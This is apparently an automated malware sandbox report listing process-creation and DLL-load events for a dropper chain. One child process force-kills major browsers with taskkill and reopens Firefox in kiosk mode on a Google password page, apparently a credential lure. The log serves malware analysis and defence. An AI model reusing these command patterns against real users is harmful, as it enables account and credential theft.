Source: unknown Process created: C:\Users\user\Desktop\g4Cyr2T5jq.exe "C:\Users\user\Desktop\g4Cyr2T5jq.exe"
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe "C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe "C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe "C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe "C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe"
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2172 -parentBuildID 20230927232528 -prefsHandle 2120 -prefMapHandle 2112 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e8f79fb1-7992-418d-8066-e9420ef7e2ed} 5040 "\\.\pipe\gecko-crash-server-pipe.5040" 2881366dd10 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe "C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001137001\num.exe "C:\Users\user\AppData\Local\Temp\1001137001\num.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3408 -parentBuildID 20230927232528 -prefsHandle 1796 -prefMapHandle 3296 -prefsLen 26395 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {225d9705-84ed-4a26-82df-72d52f28abca} 5040 "\\.\pipe\gecko-crash-server-pipe.5040" 28823e5ac10 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe "C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe"
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001137001\num.exe "C:\Users\user\AppData\Local\Temp\1001137001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2136 -parentBuildID 20230927232528 -prefsHandle 2072 -prefMapHandle 2064 -prefsLen 25350 -prefMapSize 238051 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64e16daa-e3c5-4180-ad1c-d8059eba0827} 6768 "\\.\pipe\gecko-crash-server-pipe.6768" 1eeea770d10 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe "C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe "C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe"
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe "C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe "C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe "C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001137001\num.exe "C:\Users\user\AppData\Local\Temp\1001137001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2172 -parentBuildID 20230927232528 -prefsHandle 2120 -prefMapHandle 2112 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e8f79fb1-7992-418d-8066-e9420ef7e2ed} 5040 "\\.\pipe\gecko-crash-server-pipe.5040" 2881366dd10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3408 -parentBuildID 20230927232528 -prefsHandle 1796 -prefMapHandle 3296 -prefsLen 26395 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {225d9705-84ed-4a26-82df-72d52f28abca} 5040 "\\.\pipe\gecko-crash-server-pipe.5040" 28823e5ac10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2136 -parentBuildID 20230927232528 -prefsHandle 2072 -prefMapHandle 2064 -prefsLen 25350 -prefMapSize 238051 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64e16daa-e3c5-4180-ad1c-d8059eba0827} 6768 "\\.\pipe\gecko-crash-server-pipe.6768" 1eeea770d10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: cryptbase.dll Jump to behavior
